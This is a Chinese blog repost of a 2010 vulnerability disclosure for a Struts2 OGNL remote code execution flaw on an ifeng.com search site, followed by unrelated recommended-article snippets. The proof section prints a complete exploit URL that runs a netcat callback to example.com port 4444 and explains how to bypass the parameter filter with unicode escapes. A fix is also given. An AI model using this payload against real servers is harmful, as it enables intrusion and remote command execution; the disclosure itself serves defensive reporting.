ifeng网站存在远程执行漏洞

最新推荐文章于 2024-09-29 16:13:05 发布
最新推荐文章于 2024-09-29 16:13:05 发布
阅读量704 收藏
点赞数
文章标签: web安全 网络安全 hack 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124092955
版权

漏洞详情

披露状态:

2010-07-15: 细节已通知厂商并且等待厂商处理中
2010-08-18: 细节向公众公开

简要描述:

ifeng.com域下某网站可以远程执行代码,可能造成网站被入侵。

详细说明:

利用struts2框架远程执行漏洞,使用OGNL可以通过HTTP提交参数覆盖上下文相关变量的特性,改变上下文的安全设置,远程直接执行命令。

漏洞证明:

http://search.ifeng.com/sofeng/search.action?q=MG6&c=1&('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exec("nc%20example.com%204444")')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
直接访问以上链接将会使服务器使用nc链接example.com的4444端口。
其中利用代码的http参数key中不能存在以下字符[^,#:=]。但是可以通过\u0000的java unicode string方式绕过。

修复方案:

建议排查ifeng.com旗下服务器,对所有含有struts2框架的程序进行升级(2.2.0),或过滤参数中的特殊字符。

Sword-heart
关注
关于iFeng助手连接版 部分用户会出现运行出错的情况,已经做了改进,将下面的函数覆盖即可
桑相
05-04 2070
UINT iTunesApi::InitApi() {  char *libvar = NULL;  char newlibvar[4096];  char dllpath_iTunesMobileDevice[MAX_PATH] = {0};  char dllpath_CoreFoundation[MAX_PATH] = {0};  HKEY regKey1=NULL,regKey
红队系列-SRC常用漏洞挖掘技巧
aming小老弟
12-08 1478
安全弱点sql 注入命令 注入深入利用xpath注入 (老式 ) 广泛了解乌云镜像薅羊毛。
遨游添加任意搜索引擎<红客剑原创>
weixin_34021089的博客
03-06 246
遨游添加任意搜索引擎 作者:< 红客剑原创作品> -------------------------------------------------------------------------------- 在您要添加的搜索引擎站点的搜索框内填上 * 号,然后按搜索, .完毕后地址栏里的全部内容就是我们要的URL .比如 56视频[url]W...
凤凰网视频直播视频流
mengzhengjie的专栏
05-13 9458
http://bbs.asiatvro.com/thread-745403-1-1.html 凤凰网视频直播视频流 凤凰网视频直播视频流地址: 凤凰卫视中文台:http://live.3gv.ifeng.com/zhongwen.m3u8 凤凰卫视香港台:http://live.3gv.ifeng.com/hongkong.m3u8 凤凰卫视资讯台:htt
【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
cc1988429的专栏
10-12 7179
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 湛蓝天空 声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试
Facebook技术架构以及相关漏洞资料
ackroyd的专栏
07-19 889
Facebook使用LAMP(Linux、 Apache、 MySQL、 PHP)作为技术构架。前台开发语言主要是PHP,一些后台应用使用Python、Perl和Java,以及一些gcc和Boost。   LAMP: LAMP是基于Linux,Apache,MySQL和PHP的开放资源网络开发平台,PHP是一种有时候用Perl或Python可代替的编程语言。 Linux + Apache
网站被攻击导致反复被快照劫持收录跳转处理过程
网站安全专家
03-16 1453
3月份所有的企业都开始恢复正常运营,公司网站的运营者发现网站被攻击篡改跳转,在百度的收录出现了大量的与网站本身内容不相干的快照,都是一些菠菜或违规的内容,而运营者用的是单独服务器WIN2008系统在服务器里找了好久都没有发现被篡改的问题,而且公司对这个网站的声誉非常严谨,需要尽快恢复正常访问,这个运营者束手无策后,找到了我们SINE安全寻求服务,我们接手后立马安排安全技术对客户网站的整体情况以及百度收录的情况进行了排查,发现网站在春节期间被入侵篡改收录了大量的违规快照内容,而且服务器里还有其他的网站也同样被
网站安全个人总结
weixin_30251829的博客
05-12 146
常见攻击方式:XSS、SQL注入、木马、零日攻击、僵尸网络、资源枚举、参数操作、跨站请求伪造、钓鱼欺骗、Dos攻击拒绝服务等。 常用防止方式:黑名单过滤(有时候我们在对网站过来的请求进行黑名单处理 把那些暴漏出来的攻击方法写在黑名单中 当请求过来的时候第一时间去 用黑名单进行过虑 但是 这样的话就要时刻关注有那些漏洞 要及时的去添加到黑名单中 更新 这样就出现了一种被动的防御体系 要我们时时去关...
云要闻 | 中兴通讯一条关于5G 的大新闻;阿里巴巴达摩院“发声”;微软获准在卡塔尔开设全球数据中心!...
CSDN业界要闻
01-04 611
  戳蓝字“CSDN云计算”关注我们哦!Hello,everyone:1月4日,星期五CSDN云要闻时间:嗨,大家好,偶是“CSDN 云计算”微信公众号新晋成员一枚,人称...
网络安全详解
weidl001的博客
09-21 1525
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 883
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1308
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
weixin_43263566的博客
09-26 180
信息安全工程师(24)网络安全体系建设原则与安全策略
m0_73399576的博客
09-28 846
信息安全工程师——网络安全体系建设原则与安全策略篇
Web安全-SQL注入之联合查询注入
m0_60984906的博客
09-25 346
Web安全SQL注入之联合查询注入墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 230
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
【完-网络安全】Windows注册表
最新发布
Ryoujou的博客
09-29 201
Windows注册表
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-29 1332
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
用html编写一个标题为奥运,且带两篇新闻报道,具有超链接的网站
06-13
好的,以下是利用HTML编写的网站代码: ```html <!DOCTYPE html> <html> <head> <title>奥运</title> </head> <body> <h1>奥运</h1> <h2>最新新闻报道</h2> <ul> <li><a href="https://news.sina.com.cn/sports/tokyo2020-2021-07-23/doc-ikqciyzk4286699.shtml" target="_blank">东京奥运会开幕式今晚将举行</a></li> <li><a href="https://news.ifeng.com/c/89qj4cQw1z9" target="_blank">中国体操队再夺金牌</a></li> </ul> </body> </html> ``` 解释一下代码: - `<!DOCTYPE html>`:声明文档类型为HTML5。 - `<html>`和`</html>`:HTML文档的开始和结束标签。 - `<head>`和`</head>`:文档头部标签,用于包含文档的元数据,如标题、样式表等。 - `<title>`和`</title>`:文档标题标签,用于定义文档的标题。 - `<body>`和`</body>`:文档主体标签,用于包含文档的内容。 - `<h1>`和`</h1>`:HTML标题标签,用于定义标题。 - `<h2>`和`</h2>`:HTML二级标题标签,用于定义副标题。 - `<ul>`和`</ul>`:HTML无序列表标签,用于包含列表内容。 - `<li>`和`</li>`:HTML列表项标签,用于定义列表项。 - `<a>`和`</a>`:HTML超链接标签,用于定义链接,其中`href`属性指定链接地址,`target`属性指定在新窗口中打开链接。 你可以将以上代码保存为一个.html文件,然后在浏览器中打开该文件,就可以看到你想要的网站效果了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值